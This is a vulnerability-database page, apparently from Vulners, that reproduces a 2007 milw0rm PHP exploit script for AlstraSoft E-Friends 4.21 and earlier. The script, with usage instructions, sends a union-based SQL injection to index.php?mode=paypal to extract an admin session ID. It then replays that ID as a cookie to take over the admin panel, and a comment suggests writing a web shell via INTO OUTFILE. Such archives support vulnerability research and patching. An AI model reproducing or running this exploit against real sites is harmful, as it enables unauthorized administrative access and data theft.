Lucene search
K

AlstraSoft E-Friends <= 4.21 Admin Session Retrieve Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 22 Views

AlstraSoft E-Friends 4.21 Admin Session Retrieve Exploit by BlackHaw

Code

                                                #!/usr/bin/php -q -d short_open_tag=on
&#60;?
echo &#34;
AlstraSoft E-Friends &#60;= 4.21 Admin Session Retrieve Exploit
by BlackHawk &#60;[email protected]&#62; &#60;http://itablackhawk.altervista.org&#62;
Thanks to rgod for the php code and Marty for the Love

&#34;;
if ($argc&#60;2) {
echo &#34;Usage: php &#34;.$argv[0].&#34; Host Path 
Host:          target server (ip/hostname)
Path:          path of template

Example:
php &#34;.$argv[0].&#34; localhost /efriend/&#34;;

die;
}
error_reporting(0);
ini_set(&#34;max_execution_time&#34;,0);
ini_set(&#34;default_socket_timeout&#34;,5);

/*
 ___________________________________________________________________
/       This script is part of the AlstraSoft Exploit Pack:         \
|                                                                   |
|  http://itablackhawk.altervista.org/exploit/alsoft_exploit_pack;  |
|                                                                   |
|            You can find the patches for this bugs at:             |
|                                                                   |
|   http://itablackhawk.altervista.org/download/alsoft_patch.zip    |
|                                                                   |
\________________________.:BlackHawk 2007:._________________________/

*/

/*
VULN EXPLANATION

Vuln code can be found at paypal.php:

$sql=&#34;select * from member_package where package_id=$pack&#34;;
$res=mysql_query($sql);

we can do a SQL Injection..
in this case we try to retrieve the last valid session id for being an admin
but you can also try to inject a shell with INTO OUTFILE command
*/

function quick_dump($string)
{
  $result=&#39;&#39;;$exa=&#39;&#39;;$cont=0;
  for ($i=0; $i&#60;=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) &#60;= 32 ) | (ord($string[$i]) &#62; 126 ))
   {$result.=&#34;  .&#34;;}
   else
   {$result.=&#34;  &#34;.$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=&#34; &#34;.dechex(ord($string[$i]));}
   else
   {$exa.=&#34; 0&#34;.dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.=&#34;\r\n&#34;; $exa.=&#34;\r\n&#34;;}
  }
 return $exa.&#34;\r\n&#34;.$result;
}
$proxy_regex = &#39;(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)&#39;;
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy==&#39;&#39;) {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo &#39;No response from &#39;.$host.&#39;:&#39;.$port; die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo &#39;Not a valid proxy...&#39;;die;
    }
    $parts=explode(&#39;:&#39;,$proxy);
    echo &#34;Connecting to &#34;.$parts[0].&#34;:&#34;.$parts[1].&#34; proxy...\r\n&#34;;
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo &#39;No response from proxy...&#39;;die;
	}
  }
  fputs($ock,$packet);
  if ($proxy==&#39;&#39;) {
    $html=&#39;&#39;;
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html=&#39;&#39;;
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$adminID=$argv[3];
$password=$argv[4];


$port=80;
$proxy=&#34;&#34;;

if (($path[0]&#60;&#62;&#39;/&#39;) or ($path[strlen($path)-1]&#60;&#62;&#39;/&#39;)) {echo &#39;Error... check the path!&#39;; die;}
if ($proxy==&#39;&#39;) {$p=$path;} else {$p=&#39;http://&#39;.$host.&#39;:&#39;.$port.$path;}

echo &#34;- retrieving...\r\n&#34;;
$packet=&#34;GET &#34;.$p.&#34;index.php?mode=paypal&pack=-1%20union%20select%200,0,0,0,0,0,0,0,0,sess_id%20from%20admin%20limit%200,1 HTTP/1.0\r\n&#34;;
$packet.=&#34;Host: &#34;.$host.&#34;\r\n&#34;;
$packet.=&#34;Connection: Close\r\n\r\n&#34;;
sendpacketii($packet);
$temp=explode(&#39;name=&#34;a3&#34; value=&#34;&#39;,$html);
$sess=explode(&#39;&#34;&#62;&#39;,$temp[1]);
$packet =&#34;GET &#34;.$p.&#34;admin.php?mode=ip_manager HTTP/1.0\r\n&#34;;
$packet.=&#34;Host: &#34;.$host.&#34;\r\n&#34;;
$packet.=&#34;Cookie: PHPSESSID=&#34;.$sess[0].&#34;\r\n&#34;;
$packet.=&#34;Connection: Close\r\n\r\n&#34;;
sendpacketii($packet);
if (!eregi(&#34;&#60;tr&#62;&#60;td class=&#39;lined title&#39;&#62;Admin: IP Manager&#60;/td&#62;&#34;,$html))
{
echo &#39;ERROR EXPLOITING - TRY AGAIN WHEN AN ADMIN IS LOGGED IN\r\n&#39;;
exit;
}

echo &#39;You Can use this Session: &#39;.$sess[0];
# Coded With BH Fast Generator v0.1
?&#62;

# milw0rm.com [2007-05-20]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation